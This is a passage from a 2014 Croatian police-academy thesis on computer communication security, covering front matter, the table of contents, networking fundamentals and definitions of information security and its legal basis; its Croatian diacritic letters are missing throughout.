You are on page 1of 145

MINISTARSTVO UNUTARNJIH POSLOVA

POLICIJSKA AKADEMIJA
VISOKA POLICIJSKA KOLA

SIGURNOST RAUNALNE KOMUNIKACIJE


(Zavrni rad)

Student: Vlado Kovalik


Studij: Specijalistiki diplomski studij kriminalistike

Zagreb, 2014.

MINISTARSTVO UNUTARNJIH POSLOVA


POLICIJSKA AKADEMIJA
VISOKA POLICIJSKA KOLA

Student: Vlado Kovalik

SIGURNOST RAUNALNE KOMUNIKACIJE


(Zavrni rad)

Povjerenstvo za obranu rada:

dr. sc. Stjepan Glui, predsjednik

_____________________
potpis

dr. sc. Josip Pavliek, lan

_____________________
potpis

dr. sc. Krunoslav Antoli, lan mentor

_____________________
potpis

Datum obrane rada: ...............................................

IZJAVA O AUTORSTVU
Ja, Vlado Kovalik, izjavljujem da sam autor zavrnog rada pod nazivom
Sigurnost raunalne komunikacije.
Potpisom jamim:

da je predloeni rad iskljuivo rezultat mog vlastitog rada,

da su radovi i miljenja drugih autora/ica, koje koristim, jasno navedeni i oznaeni


u tekstu, te u popisu literature,

da sam u radu potivao pravila znanstvenog i akademskog rada.

Potpis studenta:_____________________________

IZJAVA
o davanju odobrenja za objavljivanje rada u digitalnom repozitoriju
Izjavljujem da dajem odobrenje za objavljivanje moga zavrnog rada u digitalnom
repozitoriju Knjinice Visoke policijske kole bez vremenskog ogranienja i novane
nadoknade.
Potpis studenta:______________________________

U Zagrebu, .................................. godine

SAETAK
U radu se pokualo objediniti kljune imbenike sigurnosti raunalne komunikacije,
poev od elemenata sustava raunalne komunikacije, pojma sigurnosti i rizika te njihove
primjene na referentnom sustavu, prema realnim ugrozama i metodama zatite od istih. Tako
koncipiran, rad tei biti izvorom neto naprednijih informacija o sigurnosti raunalne
komunikacije, pruajui neophodnu teorijsku podlogu ali i konkretne praktine primjere i
smjernice za testiranje i zatitu sustava. Teorijske komponente ovog rada odnose se na WAN
mreno okruenje (LAN i djelomino WLAN), a praktine smjernice podrazumijevaju
implementaciju sigurnosnih mjera unutar privatnog ili manjeg korporativnog sustava raunalne
komunikacije. Alati za testiranje kritinih toaka mogue intruzije u sustav bazirani su na Kali
Linux operativnom sustavu, dok se podrazumijeva da je meta (cilj napada) ukoliko se radi o
raunalu opremljena nekim od MS Windows operativnih sustava, zakljuno sa Windows 7. Rad
e ukazati na brojne slabosti poetnih postavki mrene opreme i operativnih sustava, ali i
preporuena hardverska ili softverska rjeenja za njihovo otklanjanje. Cilj rada je podii razinu
svijesti o moguim ugrozama sustava raunalne komunikacije, obzirom na gotovo nesluen upliv
koji isti ima u svakodnevnom ivotu svakog lana drutva, kako bi se pravovremeno moglo
prevenirati brojne latentne materijalne i nematerijalne gubitke i ostvariti zadovoljavajui stupanj
zatite od neeljenih prodora treih osoba ali i represivno djelovati u odnosu na njihove dosad
moda neuoene radnje koje u naravi predstavljaju kaznena djela.
KLJUNI POJMOVI:
sigurnost raunalne komunikacije, raunalna sigurnost, sustav raunalne komunikacije,
kompjutorski kriminal, ethical hacking, kaznena djela protiv raunalnih sustava.

SADRAJ
1. UVOD ....................................................................................................................................1
2. RAUNALNA KOMUNIKACIJA........................................................................................3
2.1. Pojam raunalne komunikacije........................................................................................3
2.1.1 Raunalne mree prema zemljopisnom podruju koje ukljuuju..................................4
2.1.2 Raunalne mree prema sklopovskoj tehnologiji koja se koristi za spajanje................4
2.1.3 Raunalne mree prema funkcionalnoj vezi (mrenoj arhitekturi)................................5
2.1.4 Raunalne mree prema mrenoj topologiji.................................................................6

2.2 Mreni protokoli................................................................................................................6


2.2.1 OSI ( Open System Interconnection) model.................................................................7
2.2.2 Ethernet mreni protokol..............................................................................................8
2.2.3 Mrena oprema............................................................................................................9
2.2.4 Adresiranje................................................................................................................. 11

3. SIGURNOST I RIZICI RAUNALNE KOMUNIKACIJE...............................................12


3.1 Sigurnost raunalne komunikacije..................................................................................12
3.1.1 Pravni aspekt informacijske sigurnosti.......................................................................14
3.1.2 Kaznenopravni aspekt sigurnosti raunalne komunikacije.........................................16

3.2 Sigurnosni rizik...............................................................................................................18


3.2.1 Upravljanje sigurnosnim rizikom................................................................................19
3.2.2 Procjena rizika........................................................................................................... 19
3.2.3 Umanjivanje rizika......................................................................................................20
3.2.4 Ispitivanje i analiza.....................................................................................................21

3.3 Evaluacija sustava...........................................................................................................21


3.3.1 Evaluacijske tehnike i alati.........................................................................................23

4. MJERE SIGURNOSTI RAUNALNE KOMUNIKACIJE................................................28


4.1 Povjerljivost sadraja: kriptografija................................................................................29

4.1.1 ifriranje simetrinim kljuem.....................................................................................30


4.1.2 ifriranje po blokovima (Block Algorithm)...................................................................32
4.1.3 ifriranje asimetrinim kljuem uloga javnog kljua................................................36
4.1.4 RSA sustav ifriranja..................................................................................................39
4.1.5 Otkrivanje izvornog sadraja iz ifriranog zapisa.......................................................41

4.2 Integritet poruke i autentinost komunikatora................................................................42


4.2.1 Funkcija saimanja - Hash funkcija............................................................................43

4.2.1.1 MD5 (Message Digest version 5)...........................................................................44


4.2.1.2 SHA porodica algoritama saimanja (Secure Hash Algorithm) ...........................45
4.2.1.3 Klju autentikacije (Authentication key)...............................................................46
4.2.2 Digitalni potpis (Digital signature)...............................................................................48

4.2.2.1 CA certifikat...........................................................................................................51
4.2.3 Sigurnost na razinama slojeva OSI modela...............................................................52

4.2.3.1 Sigurnost na razini aplikacija..................................................................................54


4.2.3.2 Sigurnost na transportnoj razini.............................................................................56
4.2.3.3 Sigurnost na mrenoj razini...................................................................................58
4.2.3.4 Sigurnost na niim razinama..................................................................................60
4.3 Vatrozidi i filteri..............................................................................................................61
4.3.1 Vatrozidi.................................................................................................................... 61
4.3.2 Filtri........................................................................................................................... 66
4.3.3 Sustavi za otkrivanje upada.......................................................................................68

5. ISKORITAVANJE RANJIVOSTI SUSTAVA RAUNALNE KOMUNIKACIJE.........70


5.1 Prekoraenje kapaciteta meuspremnika na stogu..........................................................74
5.2 Prekoraenje kapaciteta meuspremnika u gomili (eng. heap overflow).......................79
5.3 Prekoraenje kapaciteta cijelog broja ( eng. integer overflow).......................................83
5.4 SQL injekcija (eng. SQL injection).................................................................................86
5.4.1 Zaobilaenje autorizacije...........................................................................................87
5.4.2 Koritenje SELECT naredbe......................................................................................88

5.4.3 Koritenje INSERT naredbe.......................................................................................90


5.4.4 Koritenje SQL Server pohranjenih procedura...........................................................91

5.5 Cross site scripting..........................................................................................................93


5.5.1 Ispisivanje skupa naredbi putem zlonamjernog linka.................................................94
5.5.2 Slanje nedozvoljenog zahtjeva...................................................................................95
5.5.3. Kraa korisnikih kolaia (eng. cookies).................................................................96

5.6 Izvoenje napada na sustavima raunalne komunikacije................................................98


5.6.1 Prikupljanje podataka o sustavu................................................................................99

5.6.1.1 Popisivanje usluga (enumeracija)........................................................................102


5.6.1.2 Odreivanje raspona IP mrenih adresa (bloka)..................................................103
5.6.1.3 Identifikacija aktivnih raunala............................................................................104
5.6.1.4 Pronalaenje otvorenih portova...........................................................................105
6.6.1.5 Identifikacija operativnog sustava i servisa (eng. fingerprinting).......................106
5.6.2 Procjena ranjivosti sustava......................................................................................108
5.6.3 Iskoritavanje ranjivosti sustava...............................................................................110
5.6.4 Poveavanje prava radi naknadnog pristupa...........................................................112
5.6.5 Presretanje raunalne komunikacije........................................................................115
5.6.6 Napad uskraivanjem usluge...................................................................................119

6. SMJERNICE ZA USPOSTAVU SIGURNOSTI RAUNALNE KOMUNIKACIJE......121


7. ZAKLJUAK.....................................................................................................................125
8. LITERATURA...................................................................................................................127

1. UVOD
U dananje vrijeme svakidanje ivotne aktivnosti sustavno su nam proete znaajnim
udjelom raunalne komponente kao kljune u brojnim procesima koji ih ine. Ponemo li
razmiljati u tom pravcu, ubrzo emo spoznati da raunala u cijelosti upravljaju svim
segmentima naih privatnih, poslovnih i openito drutvenih odnosa. Budimo se se uz zvuk
budilice sa mobilnog ureaja, sjedamo u automobil u cijelosti upravljan posebno razvijenim
raunalnim sustavom, putem podiemo gotovinu sa bankomata, registriramo ulaske u poslovne
prostore RFID1 karticom, sjedamo za raunalo i obavljamo posao ili jednostavno samo komuniciramo. Ako nastavimo o tome dublje promiljati, bez napora emo nabrojati barem jo
desetak procesa kojima upravljaju raunala, meusobno povezana u raunalni sustav putem
kojeg meusobno komuniciraju, a mnogi od njih i na globalnoj razini. Okolnosti su to koje nam
omoguuju postizanje ciljeva koje smo u ne tako davnoj prolosti mogli samo zamiljati, no
postoje i odreeni preduvjeti pod kojima se raunalni sustavi mogu smatrati korisnima. Jedan od
kljunih je njihova sigurnost.

Sigurnost moemo razmatrati ovisno o objektu kojeg smatramo tienim u pojedinom


sluaju. Tako je mogue razmatrati sigurnost raunalnog sustava i u odnosu na njegovu
pouzdanost, opstojnost ali predmet ovog rada biti e sigurnost raunalnog sustava u odnosu na
stupanj mogunosti intruzije u bilo koji od njegovih imbenika odnosno stupanj zatienosti od
neeljenog pristupa, koritenja, presretanja, onemoguavanja, administriranja ili bilo koje radnje
koja nije predviena odgovarajuom razinom dodijeljenom od administratora raunalnog sustava
u odnosu na njegovog korisnika.

Cilj ovoga rada je podii opu svijest o latentnim i vrlo stvarnim ugrozama koje prijete
sadraju komunikacije koja se putem ovakvih sustava razmjenjuje. Platni podaci sa kreditnih
kartica, osobni podaci korisnika, osobni zapisi svih vrsta, a ponekad i opa privatnost u realnom
vremenu predmet su napada potencijalno interesnih treih osoba i s tim u svezi predstavljaju
ugrozu sustava raunalne komunikacije. Tamna brojka takvih napada ogromna je, jer
oteenici vrlo esto nisu ni svjesni da su isti izvreni. Od posebnog je znaaja sigurnost
raunalne komunikacije unutar sustava putem kojih se razmjenjuju klasificirani podaci.

RFID je tehnologija koja koristi radio frekvenciju kako bi se razmjenjivale informacije izmeu prijenosnih
ureaja/memorija i host raunala, http://hr.wikipedia.org/wiki/RFID, (preuzeto 05.03.2014.).

Ovaj rad pretendira ciljano usmjerenje na sigurnost raunalne komunikacije unutar


sustava koji podrazumijeva osobna raunala (PC) i ostale mrene centralne i/ili periferne,
pasivne ili aktivne komponetne u mrenoj komunikaciji putem WAN (eng. Wide Area Network)
mrenog okruenja, sa Microsoft, Linux i Unix operativnim sustavima. Veim ili manjim
dijelom sigurnosni aspekti primjenjivi su i na mogue alternativne operativne sustave (MAC OS,
Solaris), ali uvijek e se prvenstveno odnositi na primarno navedene.

Ovo je ogranienje nuno moralo biti postavljeno kako bi se rad u odgovarajuem obimu
mogao referirati na navedenu problematiku, a da pritom ne poprimi enciklopedijske razmjere.
Opseg rada takoer ne bi dozvolio razmatranje sigurnosnih aspekata komunikacije mobilnih
ureaja, bankomata, sustava za beskontaktno biljeenje i sline opreme ija hardversko softverska obiljeja zahtijevaju posve razliiti pristup.

Izvedene smjernice i zakljuci ovog rada primjenjivi su za postizanje optimalne razine


sigurnosti kunih PC raunala bez obzira na vrstu mree putem koje komuniciraju. Zahvaljujui
brojnim provjerenim kvalitetnim referencama, rad moe posluiti upoznavanju sa funkcijama
raunalnog komunikacijskog sustava i njegove sigurnosti na neto naprednijoj razini.

Koriteno nazivlje pojedinih softvera zatieno je autorskim pravima njihovih


proizvoaa, osim ako nije drugaije navedeno.

2. RAUNALNA KOMUNIKACIJA
2.1. Pojam raunalne komunikacije

Svrha povezivanja raunala je komuniciranje, te dijeljenje resursa - podataka i ureaja


kojima se moe pristupiti putem mree (printer, skener, ploter) ili stvaranje distribuirane
obrade podataka (Zeki-Suac, 2009). Zato je vrlo jednostavna i opeprihvaena definicija pojma
raunalne komunikacije kao sustava komunikacije izmeu dva ili vie raunala (prema
Wikipedia, 2009).
Razvoj telekomunikacija zapoinje upotrebom el. energije u prijenosu informacija,
pojavom telegrafa i telefona (19. stoljee) dok prvom svjetskom mreom raunala moemo
smatrati ARPANET2 (Advanced Research Projects Agency Network), dizajniranom za potrebe
Ministarstva obrane SAD-a, koja je kasnije prerasla u Internet mreu (1960. godine).
Raunalne mree, koje definiramo kao dva ili vie povezanih raunala, mogu se pak
klasificirati prema vie kriterija (prema Zeki-Suac, 2009):
-

prema zemljopisnom podruju koje ukljuuju,

prema sklopovskoj tehnologiji koja se koristi za spajanje,

prema funkcionalnoj vezi (ili prema mrenoj arhitekturi),

prema mrenoj topologiji.


Openito mree moemo promatrati kao informacijske kanale.
Informacijski kanal (eng. information channel) je mogue openito definirati kao

sredstvo za transport informacija izmeu dvije toke u mrei, npr. A i B. Informacijski kanal je u
pravilu jednosmjeran (transport informacija mogu samo u smjeru od A do B, ili od B do A, ali
ne i u oba smjera). Nadalje, mogue je definirati i dvosmjerni informacijski kanal, to znai da su
u stvari uspostavljena dva informacijska kanala, jedan omoguava transport informacija od A do
B, a drugi od B do A (pri tome nije nuno da oba informacijska kanala budu izgraena nad istim
fizikim putovima kroz komunikacijsku mreu). Informacijski kanal je mogue promatrati na
razliitim razinama mree (podrobniji opis razina bit e opisan u modelu OSI RM). Sam
prijenosni medij takoer predstavlja informacijski kanal. Takav se informacijski kanal obino
naziva kanal. Dakle, svaki informacijski kanal promatran na vioj razini mree sastoji se na
fizikoj (ili fizikalnoj) razini od lanca kanala. Jedan od osnovnih parametara kanala je njegova
irina prijenosnog pojasa (bandwidth) koja se mjeri jedinicom herc (Hz) (Baant, 2012:7).
2

ARPANET. http://en.wikipedia.org/wiki/ARPANET. (preuzeto 17.03.2014.).

Prijenosni pojas, kojeg je mogue nazvati i propusni pojas, je onaj dio frekvencijskog
podruja unutar kojeg kanal proputa frekvencijske komponente sa svog ulaza na izlaz s
priguenjem koje je manje od neke definirane vrijednosti. Prijenosni pojas se odreuje u odnosu
na prijenosnu funkciju kanala. Prijenosna funkcija openito opisuje frekvencijsku ovisnost
omjera napona na izlazu linearnog vremenski nepromjenjivog sustava (LTI systemlinear timeinvariant system) i napona na ulazu tog sustava. Kanal i prijenosni kanal mogue je u veini
realnih komunikacijskih sustava tretirati kao LTI sustav (Baant, 2012:7).
2.1.1 Raunalne mree prema zemljopisnom podruju koje ukljuuju

PAN (Personal Area Network) slui za povezivanje ureaja za komunikaciju u blizini


jedne osobe (npr. telefon, dlanovnik, i dr.), to je mrea s uskim podrujem spajanja (npr.
bluetooth, IRDA);

LAN (Local Area Network) - lokalna mrea koja je npr. u jednoj zgradi ili prostoriji;

MAN (Metropolitan Area Network) - mrea koja se prostire preko podruja jednog
grada;

WAN (Wide Area network) - iroko podruna mrea - kao npr. Internet.
Osim ovih glavnih vrsta, tu se ubrajaju i:

VPN - Virtual Private Network;

CAN - Campus Area Network;

SAN - Storage Area Network3.

2.1.2 Raunalne mree prema sklopovskoj tehnologiji koja se koristi za spajanje

Prema sklopovskoj tehnologiji koju koriste, mree moemo podijeliti na (prema ZekiSuac, 2009):
-

optike mree - koriste optiko vlakno za prijenos podataka; podravaju velike brzine
prijenosa na velikim udaljenostima uz malu mogunost pogreaka u prijenosu i manji
utjecaj vanjskih smetnji; optiko vlakno je takoer skuplji i sloeniji medij za instalaciju
od ostalih.

Ethernet mree - skup tehnologija za prijenos podataka pakiranjem podataka u okvire;


Ethernet definira brojne standarde za oienje i signalizaciju, te zajedniki format

Zeki-Suac, M. (2009). Komunikacije i mree, str. 7.

adresiranja. Za povezivanje se koristi vodovima (bakrene vodii, optika); podrava velike


brzine prijenosa na ogranienim udaljenostima. Mediji (bakreni vodii) su iroko
dostupni i jeftini, a postupak instalacije nije sloen. Bakreni medij je podloan utjecaju
vanjskih elektromagnetskih smetnji.

beine (eng. wireless) mree - nastaju povezivanjem raunala bez uporabe fizikih veza
kratica: WLAN (Wireless LAN); prijenos podataka se odvija putem IC zraka ili
radiovalova. Korisnicima je omoguena pokretljivost unutar dometa pristupne toke (eng.
access point). Razvojem tehnologije postaju sve dostupnije i popularnije zbog
jednostavnosti instalacije, pokretljivosti korisnika i velikoj zastupljenosti beinih
mrenih kartica u novim prijenosnim raunalima. Relativno su ograniene brzine
prijenosa, te udaljenosti. Prijenos je podloan radio - frekvencijskim smetnjama, a
nepridravanjem sigurnosnih standarda ugroena je sigurnost podataka. Danas najea
inaica WLAN mree je Wi-Fi.
Bluetooth je otvoreni beini protokol za razmjenu podataka na kratkim udaljenostima

izmeu fiksnih i mobilnih ureaja u PAN mrei (Zeki-Suac, 2009:11).


Power line communication (PLC) mree - mogunost prijenosa podataka putem
naponskih vodova; prednost takvog sustava je u velikoj rasprostranjenosti strujnih vodova. Ova
tehnologija jo nije u irokoj primjeni (Zeki-Suac, 2009:11).
2.1.3 Raunalne mree prema funkcionalnoj vezi (mrenoj arhitekturi)

Prema funkcionalnim povezanostima izmeu pojedinih elemenata mree se dijele na


(prema Zeki-Suac, 2009):
-

Active networking mree - komunikacijski model koji omoguuje paketima koji


prolaze kroz telekomunikacijsku mreu dinamiku promjenu rada te mree;

Klijent server mree - raunalna arhitektura u kojoj su razdvojene uloge klijenta i


posluitelja (server). Uloga klijenta je da uputi zahtjev za odreenom uslugom
(podacima), a uloga posluitelja je da traene podatke dostavi (poslui). Svaki klijent
i svaki server u toj arhitekturi predstavlja jednog lana ili vor (eng. node) te mree.
Primjeri su: sustav razmjene elektronike pote, sustav pristupa Internet stranicama,
sustav prijenosa datoteka;

Peer-to-peer mree - raunalna arhitektura u kojoj su svi lanovi mree ravnopravni.


Ne postoji podjela na klijente i posluitelje. Svi lanovi su istovremeno klijenti i
posluitelji.

2.1.4 Raunalne mree prema mrenoj topologiji

Mrena topologija definira vie razliitih kategorija po kojima se mogu utvrditi sastavni
dijelovi i nain rada raunalne mree. Najea podjela mrene topologije se odnosi na4:
-

fiziku prikazuje fiziki raspored vorova u mrei;

logiku prikazuje raspored tijeka podataka u mrei.

Postoje slijedee fizike mrene topologije5:

Slika 1: Fizike mrene topologije raunalne mree

Izvor: http://sistemac.carnet.hr/node/342

Ring prsten; Mesh mrea; Star zvijezda; Fully Connected potpuno povezana; Line
linijska; Tree hijerarhijsko stablo; Bus sabirnika.
2.2 Mreni protokoli

Mreni komunikacijski protokol predstavlja skup pravila za prikaz podataka,


signalizaciju, autorizaciju i otkrivanje pogreaka koja su potrebna da bi se podaci mogli prenijeti
preko komunikacijskog kanala. Pojednostavljeno, protokol je ''jezik'' kojim se lanovi u mrei
4

CIS FER, (2011). Mesh mree, CIS-DOC-2011-03-008. http://www.cis.hr/files/dokumenti/CIS-DOC2011-03-008(1).pdf. (preuzeto 26.03.2014.), str. 15.
5

http://sistemac.carnet.hr/node/342. (preuzeto 17.03.2014.)

dogovaraju oko prijenosa podataka. Da bi se podaci uspjeno prenijeli lanovi moraju pronai
zajedniki ''jezik'' (prema Zeki-Suac, 2009:14).
Najei protokoli koji se danas koriste su: TCP/IP, Ethernet, IPX, FDDI, Token Ring,
X25, Frame relay, ATM, i dr6.
Internet koristi TCP/IP protokol za komunikaciju, dok se lokalna mrea koja radi na
TCP/IP protokolu naziva intranet7.
2.2.1 OSI ( Open System Interconnection) model

OSI - model ili referentni model za otvoreno povezivanje sustava je najkoriteniji


apstraktni opis arhitekture mree. Opisuje komunikaciju hardvera, programa, softvera i protokola
pri mrenim komunikacijama. Koriste ga proizvoai pri projektiranju mrea, kao i strunjaci pri
prouavanju mrea. OSI model dijeli arhitekturu mree u sedam logikih razina, daje spisak
funkcija, servisa i protokola koji funkcioniraju na svakoj razini. Veina servisa i protokola, u
kontekstu komunikacijskih mrea, funkcioniraju kao jedinstvena cjelina. (Wikipedija, 2014).
Da bi se predoila njihova veza, funkcija u svakom od procesa komunikacije, a istodobno
i radi razumijevanja samog procesa, uvedena je konceptualna skica, tj. referentni model,
reguliran normom ISO/IEC 7498-18. Jo jedan od razloga za uvoenje referentnog modela je da
se izvri standardizacija samih protokola. U zaetcima nastajanja mrea, tvrtke su zasebno
primjenjivale vlastite solucije, tako da je komunikacija bila mogua samo izmeu raunala u
okviru mree tog istog proizvoaa.
Meu najvanije protokolne modele koji su razvile pojedine kompanije spadaju9:

Arhitektura mrenih IBM sustava IBM System Network Architecture (SNA);

DECnet firme Digital;

Netware firme Novell;

AppleTalk firme Apple;

Prvi razvijeni TCP/IP model.


Krajem 1979. godine Meunarodna organizacija za standardizaciju ISO kreirala je

referentni model OSI da bi se premostili navedeni problemi, a 1984 godine tiskala je reviziju
6

Zeki-Suac, M. (2009). Komunikacije i mree, str. 14.

loc. cit.

prema OSI model. http://en.wikipedia.org/wiki/OSI_model. 14.03.2014. (preuzeto 17.03.2014. ).

loc. cit.

ovog modela koja je postala meunarodni standard i vodi za umreavanje. Naziv otvoreni
sustav, dolazi od toga to ga je mogue stalno modificirati,a pri tome sudjeluju svi. Svaka
izmjena koja bi se ubacila i prihvati postala bi standard. TCP/IP protokol je tek jedan od primjera
otvorenog sustava, naime na oblik protokola moe se utjecati putem RFC-a, tehnikih izvjetaja
koji su objavljeni i koje su analizirala internet drutva10.

Slika 2: Protokoli u slojevima OSI mrenog modela

Izvor: http://hr.wikipedia.org/wiki/Ra%C4%8Dunalne_mre%C5%BEe modificirano


Od posebne vanosti za ovaj rad je Ethernet protokol, kao osnovni protokol LAN mree
ija e se sigurnost komunikacije uzimati kao primjer u veini sluajeva.

2.2.2 Ethernet mreni protokol

Ethernet predstavlja skup mrenih raunalnih tehnologija primjenjenih unutar lokalnih


mrea (LAN Local Area Network). Na fizikom sloju Ethernet definira raspored oienja, te
vrste i razine signala za prijenos podataka. Na drugom sloju Ethernet definira nain pristupa
mediju za prijenos podataka (MAC Media Access Control) i definira zajedniki adresni
format. Ethernet je standardiziran kroz IEEE 802.3 standard11.

10

loc. cit.

Mediji za prijenos podataka u Ethernet mrei su12:


-

koaksijalni kabel ranije;

UTP (Unshielded Twisted Pair) kabel danas najee koriten;

optika vlakna.

Slika 3: Vrste oienja, slijeva nadesno: Koaksijalni kabel, UTP kabel i optiki kabel.

Izvor: http://sistemac.carnet.hr/node/356
Radi boljeg razumijevanja Ethernet okruenja, slijedi kratki presjek osnovne mrene
komunikacijske opreme.

2.2.3 Mrena oprema


Mrenu opremu dijelimo na13:
-

Pasivnu - sainjava je ini sustav (bakar i optika) koji slui za povezivanje aktivne
opreme;

11

Pralas, T. (2008). Raunalne mree Ethernet. http://sistemac.carnet.hr/node/356. (preuzeto


21.03.2014.).
12

Zeki-Suac, M. Komunikacije i mree, str. 17.

13

ibid., 18.

Aktivnu - sainjavaju je svi elektroniki ureaji koji prihvaaju i distribuiraju promet


unutar raunalnih mrea (imaju memoriju i procesor).

U pasivnu opremu pripadaju kablovi, konektori, razvodni paneli (patch panel, switching
panel, punch-down panel), komunikacijski ormari i sustav za napajanje elektrinom energijom
(vodovi, sklopke i naponske letve, sustav za hlaenje), te hub (pojaava primljene signale i
prosljeuje ih dalje)14:
-

patch panel koristi se za koncentriranje dolaznih kablova iz utinica razmjetenih


po prostorijama u lokalnoj mrei (LAN). Iz njih se tzv. patch kablovima povezuju
raunala s aktivnom opremom (obino switch);

komunikacijski ormar - za smjetaj pasivne i aktivne mrene opreme (kablovi,


patch paneli, switchevi, routeri, serveri,...);

hub - slui za pojaavanje primljenog signala (napona) kojeg alje na svoje portove.
Nema mogunosti usmjeravanja prometa, ve ih samo pojaava, tj. ima funkciju
repeater-a (pojaivaa signala).
Slika 4: Komponente pasivne mrene opreme, slijeva nadesno: patch, hub i
komunikacijski ormar.

Izvor: http://sistemac.carnet.hr/node/374
Aktivnu komunikacijsku opremu sainjavaju ureaji koji koriste izvor elektrine energije
i koji omoguuju aktivno upravljanje mrenim prometom. Zajednika im je znaajka da imaju
procesor i memoriju. Na osnovu svojih znaajki, namjene, operativnog sustava i ugraenih
programa donose odluku o putanji mrenog prometa kojeg generiraju ili koji kroz njih prolazi15.
Aktivna oprema se sastoji od16:
-

raunala i posluitelja koji stvaraju promet;

14

Pralas, T. (2008). Raunalne mree Pasivna i aktivna mrena oprema.


http://sistemac.carnet.hr/node/374. (preuzeto 21.03.2014.).
15

loc. cit.

16

loc. cit.

10

preklopnika (switch-a); slui za povezivanje dvaju raunala unutar iste mree (LAN)
ili za povezivanje raunala i routera za promet koji je namjenjen drugim mreama;

usmjerivaa (router-a) koji usmjeravaju promet od izvora do odredita prema


logikim adresama (IP adrese) raunala u mrei.

Slika 5: Komponente aktivne mrene opreme, slijeva nadesno switch i router.

Izvor: http://sistemac.carnet.hr/node/374
2.2.4 Adresiranje
Da bi se raunala u mrei mogla razlikovati, koristi se mreno adresiranje17:
-

u lokalnoj mrei; provodi se na nain da svaka mrena kartica kao i svi aktivni mreni
ureaji u svojoj ROM memoriji sadre jedinstveni identifikator MAC (Media Acess
Control) koji se jo zove i ethernet adresa;

na Internet mrei; za komunikaciju se koristi IP adresa - (Internet Protocol Address) jedinstveni broj za svaki ureaj koji komunicira s drugom mreom na temelju Internet
protokola (TCP/IP).

Izvorno je IP adresa napravljena kao 32-bitni broj (IPv4 nain), meutim zbog poveane
uporabe Interneta danas se koristi i 128-bitni zapis IP adresa (IPv6 nain). IP adresa se moe
unaprijed odrediti, a moe se podesiti i automatska dodjela IP adrese18.
Slika 6: Ilustracija IP adrese u decimalnom i binarnom obliku

17

Zeki-Suac, M. Komunikacije i mree, str. 23-24.

18

loc. cit.

11

Izvor: http://en.wikipedia.org/wiki/IP_address

Slika 7: Ilustracija WAN mrenog Windows okruenja

Izvor: http://technet.microsoft.com/en-us/library/cc751403.aspx

3. SIGURNOST I RIZICI RAUNALNE KOMUNIKACIJE


3.1 Sigurnost raunalne komunikacije

Da bismo pravilno razumjeli pojam sigurnosti raunalne komunikacije, potrebno je


najprije ponaosob definirati koritene pojmove.
Sigurnost je osjeaj pojedinca da je zatien od bilo koje prijetnje ili bilo kakvog
neeljenog dogaaja (Na, 2009).

12

Postoji niz definicija sigurnosti, no mnogi se autori slau da je sigurnost stanje i stupanj
otpornosti i zatienosti od ugroza i opasnosti, ali i odreenu kontrolu neizvjesnosti gdje se
uoena i prepoznata opasnost svodi u granice prihvatljivog rizika.
To je dakle stanje u kojem je mogue normalno odvijanje svih prirodnih i drutvenih,
vitalnih i razvijenih (uobiajenih, dostignutih) funkcija i odravanje stvorenih, steenih
vrijednosti i kvaliteta (Na, 2009).
Sustav raunalne komunikacije, koja u informatikom smislu predstavlja tehnoloki
sustav sainjen od pasivnih i aktivnih mrenih komponenata, samo je jedan segment
informacijskog sustava koji osim tehnolokog imbenika obuhvaa i ljudske potencijale, te
brojne fizike/tehnike i ine imbenike koji uestvuju u obradi, pohrani i prijenosu podataka
kako bi isti bili dostupni i uporabljivi ovlatenim korisnicima.
Informacijska sigurnost JE (Hadjina, 2009:6):
-

Nain razmiljanja;

Beskonaan proces;

Upravljanje rizikom;

Jamstvo poslovnog uspjeha;

Odgovornost svakog zaposlenika.

Informacijska sigurnost NIJE (Hadjina, 2009:7):


-

Odgovornost samo IT-a;

Problem koji se rjeava samo tehnologijom;

Konano odredite 100% sigurnost nije mogua.

Sigurnost informacijskih sustava obuhvaa primjenu mjera za zatitu podataka


koji su u obradi, ili su pohranjeni, ili je u tijeku njihov prijenos, od gubitka povjerljivosti,
cjelovitosti i raspoloivosti, te radi sprjeavanja gubitaka cjelovitosti ili raspoloivosti
samih sustava (Hadjina, 2009:7).
Jedini informacijski sustav koji je zaista siguran je onaj koji je ugaen, iskljuen iz
napajanja, zakljuan u sefu od titana, zakopan u betonskom bunkeru, te okruen nervnim

13

plinom i dobro plaenima naoruanim uvarima. ak ni tad, ne bih se ba kladio na


njega.
Eugene Spafford
Direktor Computer Operations, Audit and Security Technology (COAST)
Purdue University (Hadjina, 2009:7).
Zato je raunalnu komunikaciju sa sigurnosnog aspekta mogue objasniti kao podatkovno
prijenosnu komponentu informacijskog sustava, i s tim u svezi sigurnost raunalne
komunikacije kao zadovoljavajuu razinu prihvatljivog rizika od ugroza i opasnosti usmjerenih
ka vitalnim i razvijenim funkcijama, vrijednostima i kvalitetama cjelokupnog sustava raunalne
komunikacije.
Kljuno je sagledati sigurnost raunalne komunikacije i kao sastavni dio nacionalne
kritine infrastrukture koju predstavljaju sustavi, mree i objekti od nacionalne vanosti iji
prekid djelovanja ili prekid isporuke roba ili usluga moe imati ozbiljne posljedice na nacionalnu
sigurnost, zdravlje i ivote ljudi, imovinu i okoli, sigurnost i ekonomsku stabilnost i neprekidno
funkcioniranje vlasti.19
lankom 4. Zakona o kritinim infrastrukturama (Narodne Novine, 2013) kao jedan od
sektora nacionalne kritine infrastrukture odreuje se tako i:

komunikacijska i informacijska tehnologija (elektronike komunikacije, prijenos

podataka, informacijski sustavi, pruanje audio i audiovizualnih medijskih usluga).


3.1.1 Pravni aspekt informacijske sigurnosti

U dananjem vremenu informacije su jedan od najvanijih resursa u poslovnom smislu, te


je jasno da upravo o njima ovisi uspjenost poslovanja veine organizacija.20
Pravodobno posjedovanje, ispravnost i tajnost informacije od presudne su vanosti za
poslovni uspjeh, koji se u tom smislu osigurava zatitom informacijskog integriteta,
povjerljivosti i dostupnosti informacije uz primjenu propisanih mjera i standarda informacijske
sigurnosti te organizacijskom podrkom za poslove planiranja, provedbe i dorade mjera i
standarda.

19

20

lanak 3. Zakona o kritinim infrastrukturama, NN, 56/13


Antoli, K., i dr., (2010). Sigurnost informacijskih sustava, str. 98.

14

Spomenuti parametri informacijske zatite standardizirani su kroz slijedea podruja


informacijske sigurnosti21:
sigurnosna provjera (podruje u ijem se okviru utvruju mjere i standardi
informacijske sigurnosti koji se primjenjuju na osobe koje imaju pristup
klasificiranim podacima);
fizika sigurnost (u okviru koje se utvruju mjere i standardi informacijske
sigurnosti za zatitu objekta, prostora i ureaja u kojima se nalaze klasificirani
podaci);
sigurnost podataka (podruje utvrivanja mjera i standarda koji se primjenjuju kao
ope zatitne mjere za prevenciju, otkrivanje i otklanjanje tete od gubitka ili
neovlatenog otkrivanja klasificiranih i neklasificiranih podataka);
